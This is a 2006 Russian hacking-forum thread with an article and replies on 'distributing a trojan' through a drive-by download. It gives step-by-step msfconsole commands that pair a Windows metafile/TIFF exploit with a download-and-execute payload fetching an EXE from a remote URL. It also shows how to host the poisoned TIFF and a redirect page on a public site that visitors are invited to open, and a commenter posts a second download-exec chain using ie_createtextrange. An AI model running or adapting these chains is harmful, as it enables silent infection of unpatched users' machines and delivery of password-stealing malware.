Авторские статьи Раздача Троя (Или Metasploit Framework часть 2)

Discussion in 'Статьи' started by -=lebed=-, 13 Jul 2006.

1. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Раздача троя​

Предисловие.​

Наверно многие пользователи ПК с Windows, выходя в интернет, лазая по Web-сайтам или просто общаясь по аське, некоторое время, ничего не скачивая и не запуская, обнаруживали у себя различного рода вредоносные программы (вирусы), в последствии удаляли их антивирусом, ставили файрвол и спали спокойно, не задумываясь над тем, каким образом они проникли на Ваш компьютер.
    Так было с Windows 2000, XP Sp1. Cетевые черви, эксплуатирующие уязвимости в сервисах DCOM, LSASS безпроблем сами проникали в Ваш компьютер, без каких либо действий с Вашей стороны (за исключением выхода в инет) превращая Ваш компьютер в компьютер-зомби или скрипткидисы, сканируя диапазоны IP-адресов на бажные (дырявые) сервисы, проникали на Ваш комп, делая, что их душе угодно (автороутер KAHT2).
    Но вскоре вышел SP2 для Windows XP, пославший всех известных сетевых червей куда подальше, прикрывший все дыры в бажных сервисах. Все успокоились на некоторое время, но не тут то было, лазая по сайтам, ничего не скачивая и не запуская на Вашем компе через некоторое время, снова обнаруживается зараза. Вы спросите как это возможно? Как это происходит? Просто занимаясь Веб-серфингом, Вы не скачиваете exe, com, bat,cmd,scr – представляющие потенциальную угрозу (а если скачиваете, то проверяете антивирусом перед запуском), но вы скачиваете много других файлов разных форматов – html, графических, музыкальных, видео и других. Ну и что, скажете Вы, они же неисполняемые!? М..да и будете правы – они не исполняемые, они обрабатываемые Вашим браузером, системой.
    (Прим.: опустим здесь уязвимости движка IE в выполнении каких либо скриптов, функций – это отдельная большая тема). Многие поняли к чему я клоню. До некоторого времени считалось, что картинки (файлы форматов jpg, wmf, tiff) не могут содержать вирус – теперь это не так. Могут! Ведь кто Вам мешает записать туда кусок исполняемого кода и когда такой файл будет обрабатываться системой (системной библиотекой) передать управление на тот кусок исполняемого кода? Вопрос в том, как туда передать управление? Правильно! Искать, находить и использовать уязвимости в обработке системой специально сгенерированных файлов, тем или иным образом компрометирующих систему (проще говоря, заставляющих систему дать сбой при их обработке). Что и было сделано уже до нас в 2004-2005 годах и делается и по сей день…

1.Выбираем уязвимость.​

Будем использовать уязвимость в обработке метафайлов системной библиотекой shimgvw.dll, существующую во всех системах WINDOWS, начиная с версии 3.хх и не только.
    Подробности уязвимости тут:
    http://www.securitylab.ru/vulnerability/243581.php
    http://www.xakep.ru//magazine/xa/086/066/1.asp
    http://www.xakep.ru/post/29503/default.asp
    http://www.xakep.ru/post/28680/default.asp
    http://www.xakep.ru/post/29529/default.asp
    - патч, закрывающий дыру.

2.Наша задача: Залить посетителю сайта исполняемый файл и передать ему управление.​

Наш клиент: Система не пропатченые Windows XP, XP SP1, XP SP2, 2000, 2003. ( Прим. Win2003 server при дефалтной настройке безопасности не пробивается).
    Мы : Система Windows SP2 (тоже не патченая) с установленным пакетом Metasploit Framework v.2.6. для Cygwin (win32)

3. Подготовка.​

Для начала определимся с хостом в инете, где будет лежать тот исполняемый наш файл, который будет скачан при заходе клиента на нашу WEB-страницу. Пусть это будет http://nash.site.ru например. У меня пока http://localhost. Определились (это параметр будущей начинки нашего сплоита, чтоб знал, что и откуда грузить).

4. Готовим ядовитый tiff - файл.​
    (содержащий эксплоит и начинку - загрузчик нашего экзешника)​

Запускаем пакет (консоль MFV)
    а) Выбираем сплоит (ie_xp_pfv_metafile):

+ -- --=[ msfconsole v2.6 [145 exploits - 75 payloads]

msf > ls
    framework perl.exe.stackdump run_msfupdate userguide.pdf
    framework.tar run_msfconsole run_msfweb
    msf > cd framework
    msfconsole: chdir: changed to directory framework
    msf > use ie_xp_metafilemsf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile >

б)задаём параметры:

msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
    LHOST -> 10.0.0.1
    msf ie_xp_pfv_metafile >

в)Выбираем начинку, нам нужно скачать и исполнить, ок, нет проблем, посмотрим сначала что у нас есть из начинок.

msf ie_xp_pfv_metafile > ls payloads
    Empty.pm linux_ia32_reverse_xor.pm
    bsd_ia32_bind.pm linux_sparc_bind.pm
    ------ пропущено ---------------------------------------
    cmd_unix_reverse_bash.pm win32_downloadexec.pm
    ------ пропущено ---------------------------------------
    linux_ia32_reverse_udp.pm win32_reverse_vncinject.pm
    msf ie_xp_pfv_metafile >

Win32_downlodexec - вот оно самое! Название начинки говорит само за себя, посмотрим по ней инфу

msf ie_xp_pfv_metafile > info win32_downloadexec

Name: Windows Executable Download and Execute
    Version: $Revision: 1.1 $
    OS/CPU: win32/x86
    Needs Admin: No
    Multistage: No
    Total Size: 340
    Keys: noconn

Provided By:
    lion[at]cnhonker.com
    pita[at]mail.com

Available Options:
    Options: Name Default Description
    -------- ------ ------- ------------------------------
    required URL Complete URL to the target EXE

Advanced Options:
    Advanced (Msf::payload::win32_downloadexec):
    --------------------------------------------
    Description:
    Download an EXE from a HTTP URL and execute it

msf ie_xp_pfv_metafile >

Ага! Скачивает exe-файл с HTTP URL (c web-страницы по протоколу HTTP) и запуcкает его, то что надо!
    Опция URL - там где распалагается наш экзешник. Не забудем её установить...
    И так - берём эту начинку - она нам подходит.

msf ie_xp_pfv_metafile > set PAYLOAD win32_downloadexec
    PAYLOAD -> win32_downloadexec
    msf ie_xp_pfv_metafile(win32_downloadexec) >

г) Устанавливаем переменную URL (HTTP адрес нашего экзешника в инете, я локально запустил свой сервак Apache и кинул в корень экзешник VirtualGirl, в самораспаковывающемся архиве vr.exe - вируальные тёлки вылезающие справа экрана будут мне показывать стриптиз ;-))

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://10.0.0.1/vg.exe
    URL -> http://10.0.0.1/vg.exe
    msf ie_xp_pfv_metafile(win32_downloadexec) >

д)Ну всё готово! Командуем exploit

msf ie_xp_pfv_metafile(win32_downloadexec) > exploit

[*] Waiting for connections to http://10.0.0.1:8080/

Подняли ещё один (помимо Апача) локальный WEB сервер на 8080 порту с нашим сплоитом. Заходим на него через браузер сами и автоматом скачиваем ядовитый tiff файл (благо настройка безопасности броузера IE6 это разрешает и не блокирует автоматическую загрузку tiff-файла)

[*] HTTP Client connected from 10.0.0.1:4401, redirecting...

[*] HTTP Client connected from 10.0.0.1:4403, sending 1500 bytes of payload...

Всё! Появлеяется красный значок "2" в трее и тёлки начинают периодически вылезать справа внизу экрана, весело танцевать и раздеваться, правда не доконца - версия триальная ;-(

ж) Разбираемся что же произошло и как это может быть? Был автоматически загружен ядовитый tiff-файл, содержащий наш сплоит и начинку (загрузчик), далее он был открыт программой просмотр факсов (была подгружена бажная dll не без помощи rundll32.exe, которая потеряла управление и передала его на наш загрузчик, он в свою очередь загрузил наших тёлок (файл vg.exe) с Web-сервера Апач и запустил, после чего они стали благополучно танцевать на моём рабочем столе ;-)
    Находим наш ядовитый tiff - файл - это готовый наш эксплоит (содержит собсвенно сам сплоит, начинку загрузчик со всеми параметрами). Он лежит в c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\ Его имя типа что-то 1D5TRR3e0[1].tiff (размер всего 28Кб.) проверим Антивирусом Касперского этот файл. Он скромно нам сообщает о том, что файл "возможно является потенциально опасным ПО Exploit.Win32.IMG-WMF" всё так и есть на самом деле (наш загрузчик - не такая уж опасная начинка сполита, всё зависит от того что он грузит и запускает, а вместо наших, безобидно пляшущих тёлок, можно загрузить и троя ворующего пароли) Убъём процесс плящущих тёлок (VirtuaGirl2.exe,Vg.exe - был обычный самараспаковывающийся в system32\vg архив с последующим запуском самой проги VirtuaGirl2.exe) и попробуем просто посмотреть папку с ядовитым tiff файлом в стандартном проводнике Windows, Опс! Тёлки опять пляшут у нас на экране! (Снова подгрузилась бажная DLL c помошью rundll32.exe и сделала своё чёрное дело)! Всё проверено, наш подопытный Tiff-файл превратился в успешно исполняемый (на не пропатченных системах Win).

5. Вешаем сплоит в интернете на своём сайте.​

Так как в параметре URL (для начинки загрузчика) мы указали http://localhost/vg.exe нам придётся пересобрать ядовитый Tiff файл с другими параметрами.
    а) Выбираем что будем грузить (исполняемый exe-файл). Я взял картинку (женскую задницу с паутинкой на ней), открыл в фотошопе, дописал текст "Заштопайте дырку в Вашей системе", сохранил в формате JPG, затем открыл инфравьювером и сделал из неё исполняемый экзешник, обозвал его picture.exe.

б) Выбираем host в интернете.
    Я зарегал себе сайт на народе http://vulnerabilitywmf.narod.ru/, на главной странице сделал ссылку на http://vulnerabilitywmf.narod.ru/Testwmf.html и обозвал её тест на WMF-баг.

в) Готовим новый ядовитый tiff-файл (см. п 4)
    Всё делаем тоже самое, только задаём наш новый URL, где будет лежать наш picture.exe.

msf ie_xp_pfv_metafile(win32_downloadexec) > set URL http://vulnerabilitywmf.narod.ru/picture.exe
    URL -> http://vulnerabilitywmf.narod.ru/picture.exe

Содержание Testwmf.html - это всего лишь переадресация на наш ядовитый tiff файл. Его содержание мы получим, если посмотрим HTМL код (когда будем открывать ссылку у себя с локально поднятого Metasploit`ом Framework WEB-сервера, нам лишь нужно изменить ссылку переадресации на народовскую и сохранить под именем Testwmf.html. Сам сформированный таким образом tiff- файл возьмём из c:\Documents and Settings\Администратор\Local Settings\Temporary Internet Files\, обзовём Sploit.tiff. Закачаем в корневую папку нашего Web-сервера на народе эти два файла Testwmf.html, Sploit.tiff, а также не забудем наш picture.exe, который будет скачиваться с сайта, запускаться и выводить картинку о том что Ваша система уязвима к WMF-багу. Всё готово!

Содержание файла Testwmf.html

<html><meta http-equiv='refresh' content='0;
    URL=http://vulnerabilitywmf.narod.ru/Sploit.tiff'><body><div class='kMM5zm0Z82kjbGwPCrIz3s4NdTqA3q7AJIuWcqUXECeK25CbzHHCAD23COOjdba23A3UXfOV08bs3TyJadiD4HDQsi6PlcTeIAPSZ8IAR7EyhZjGyaVHvma1m6bdhDQrsolEK0N3jAWSE7I5Vdrka3Cm3Eh4xoZsCEoo99Dd0v26nnV5OMBUV1swSohhVQDhQwP4DpaeBiUi3cAsYFeGwWBIYEVL9P0K7agPzmlqP4RuhYTxHs4a7n89igzS9inVrxXM0fjjjMSH27Y3xdCPTK6VNo9N2M2FS58C41vzFuSXMEfclePUznS8L3bhULrn6fhQSgqgZHPgN1TrTPrUbOQnRKkGdscYyVIMskJCjxBOTvn13XwhYBgKtTL7H6BDyH2PNwX3NCrK7giEXHKb4y7wL7oEavd1sI6gmalISNCesj0bg8DzmBPIV5n7hWqHVfF9FvmwARRZkMnqiAAuX5nrJTY7lxJiOMF8V63rOnPz7Mu86VBHwBQ2x8dqxIwQVmcSsPhjOOrBuP5YHVPAL0EZInI2z05XP9Sm9GyX5E5cQwygO4zpTuBg1lHbKqRKSQTdLRl0M3zsPmBt7jaUXI2WS3EIDvRGV22mA3VdCP7Yl9wjJj3f7xfKxBfLHJEMYBj7Lg9hmyNLUfjyv3oTDndxsTMipsFZ3uXtlQRrGDa7IUjlbJLHPWV7KtPWxcVN2hpYWyO'></div>One second please...</body></html><!-- ><!-- "><!--'><!-- --></textarea></form>
    </title></comment></a>
    </div></span></ilayer></layer></iframe></noframes></style></noscript></table></script></applet></font>
    <style>
    #bn {display:block;}
    #bt {display:block;}
    </style>
    <script language="JavaScript" src="http://bs.yandex.ru/show/163"></script>
    <!-- mailto:[email protected] -->

Это уже после того, как он был залит на народ.ру.
    Результат работы тут:

#1 -=lebed=-, 13 Jul 2006
    Last edited by a moderator: 2 Jan 2007
  2. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Сделал сайт на народе для тестирования IE6 (WINDOWS XP SP2) с настройкой безопасногсти браузера по умолчанию, кто хочет провериться - заходите (оперой не катит, только если сохранить файл Sploit.tiff, а потом глянуть его свойства например). Виря нет, не бойтесь, там безобидный экзешник грузится, сделанный инфравьювером и выводит картинку о том что ваша система уязвима!
    Отпишитесь плиз, те кто затестил.... в поненельник напишу как это сделал подробно....
    Уже написал, см. п 5 статьи.
    Ссылка для проверки

#2 -=lebed=-, 14 Jul 2006
    Last edited: 17 Jul 2006
  3. zeppe1in

zeppe1in Elder - Старейшина

Reputations:
    18
    Я тестил, на мне не работает. Я и с Metasploit Framework на себе тестил тоже не пашет.
    Зато если в тотал командере нажимаю свйства фаила тифф то всё работает. А если в проводнике свойства, то "Для защиты компьютера эта программа была закрыта системой".
    Такие дела.

4. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Не всегда бажная библиотека подгружается.... поэтому и не всегда работает. Поставил чистую винду с нуля на виртуал PC захожу на сайт- всё работает как часы... (Правда файловая система FAT32, а не NTFS)

#4 -=lebed=-, 14 Jul 2006
    Last edited: 14 Jul 2006
  5. zeppe1in

zeppe1in Elder - Старейшина

Reputations:
    18
    По этому придётца юзать лаговый ie_createtextrange:).
    ps: кстати спасибо за статьи, теперь я знаю крутую штуку - метасплойт.

6. Electro

Electro Elder - Старейшина

Reputations:
    39
    Тестил! Значит так ...вопервых у меня сразу довнолоудер выскачил ..начал качать ..на половине дороги гаишник остоновил ...и сказал что у вас на багаже бактереологическое оружия (Exploit WMF троян)
    ...дал гаишнику взятку и сохранил на машине потом выскачил ж**а с паутиной в дырке :D
    Пиши продолжения статьи ...чё то затянуло

2 people like this.
  7. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Спасибо антивирю - подстраховал а система сама дырявая как видишь....

1 person likes this.
  8. Electro

Electro Elder - Старейшина

Reputations:
    39
    Я уже пропачтил машину ...но посде этого не испытывал есь честно.
    Ты мне вот что скажи
    это параметр так?! Ты этот параметр задал потому что у тя локалхост , а вот я хотел на серваке испытать че то не вышло .... какой параметр нужно задать для сервака? я не могу задать айпи сервака у меня не выделенный сервер
    И еще
    У меня останавливается вот тут а потом ничего не присходит! И где сохраняется этот зараза тифф?? Просто на вирей не тестиривал этот сплоит вот интересно стало ....

#8 Electro, 19 Jul 2006
    Last edited: 19 Jul 2006
  9. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    LHOST - да, параметр - локальный адрес IP, (я пробовал и внешний использовать - то же прокатывало) вообще-то он в основном нужен для начинок. WEB - сервер у меня поднимается на том же компе, где и стоит пакет Metasploit Framework - т. е. локально, (через NAT можно сделать чтоб он светил и в инет, и был доступен от туда). Я же использую получившийся tiff файл (готовый уже сплоит) и мне уже не надо поднимать WEB сервак Metasploitom каждый раз. Где он есть? Он висит на серваке, поднятым Metasploitom, в явном виде - (в виде файла на диске) его ещё ИМХО нет. Забрать его можно, зайдя браузером IE на этот сервак, в папке временные файлы интернета он там уже будет потом.
    А если ты спрашиваешь где у Web-сервера, который поднимает Metasploit корневая папка на диске, то я вообще не уверен что она есть (ИМХО всё в оперативке только висит).
    2 Останавливается - правильно - ждёт подключений (захода юзера браузером на этот web-сервер)

10. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Провериться на баг в функции createtextrange можно Тут
    P.S. С маленькой виртуальной памятью по ссылке не ходить (съёдает около 1 Гб.)
    Затестил на Virtual PC, предварительно отдав 2 Гб. под файл подкачки, всё работает, только медленно... Сплоит так себе.....но рабочий.... Кто нибудь знает как его доработать чтоб столько свопа IE не сжирал?

#10 -=lebed=-, 26 Jul 2006
    Last edited: 26 Jul 2006
  11. Федя

Федя New Member

Reputations:
    0
    Жопа сработала!
    Захожу с оперы 9 - качается tiff, затем outpost рубит исход. соединение от EXPLORER.EXE
    Скриншот: http://bla527.jino-net.ru/wmf.jpg
    Разрешил - жопа открылась!
    РЕСПЕКТ ЛЕБЕДЮ!

З.Ы. OPERA 7 rulez ; OPERA 9 MUST DIE!

12. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Спасибо скажи Аутпосту! Кстати браузер здесь почти не причём, Tiff-файл можно чем угодно закачать.
    Тесть дыру IE6 в функции createtextrange тут
    Жопа должна быть та же....

13. Федя

Федя New Member

Reputations:
    0
    Эта хрень ещё и кешируется? Я, не подключенный к инету, зашёл в свойства того тиффа и опять жопа! Крутой сплойт... :)

14. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    Жопа - это скаченный файл picture.exe в директории system - удали его и всё, это он выводит картинку (совсем не опасен), а прикинь если был приватный трой!?

15. Федя

Федя New Member

Reputations:
    0
    Слушай, -=lebed=-, а где взять этот пакет?

16. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
  17. Федя

Федя New Member

Reputations:
    0
    Сижу качаю. В тот раз малясь не то скачал, а твою ссылку download master не съел почему-то. Кста, мышкой на тифф наводишь и опять ... э... ЖЭ...
    В общем всё, отваливаю. Извини за оффтоп!

#17 Федя, 26 Jul 2006
    Last edited: 26 Jul 2006
    1 person likes this.
  18. DCRM

DCRM Elder - Старейшина

Reputations:
    -1
    А у меня такой прикол.. вроде откомпилировал сплоит, всё как положено! Залил на сайт... начинается закачка сплоита... далее ругается ошибка(как и должно быть :) ) и... всё... файл не скачивает! :mad:

И createtextrange - жопы нет! Но 2 гига отжирает только так! :) а самому сделать это...:

use ie_createtextrange
    set PAYLOAD Win32_downlodexec
    set URL www.dark-krimson.narod.ru/hack.exe
    exploit

Лезу по адроесу, хаваю HTML код, выплёвываю на свой сайт... - Как и ожидалось, память забивает, а файл не скачивает... :confused:
    www.dark-krimson.narod.ru/hack.html

#18 DCRM, 12 Dec 2006
    Last edited: 12 Dec 2006
  19. -=lebed=-

-=lebed=- хэшкрякер

Reputations:
    594
    ie_createtextrange - не всегда пашет!

20. Ky3bMu4

Ky3bMu4 Elder - Старейшина

Reputations:
    42
    Плиз , не ругайтесь.
    Столкнулся с проблемой. Хост меняю на адрес сайта, а при комманде exploit, всё равно наровит на мой ip законектится.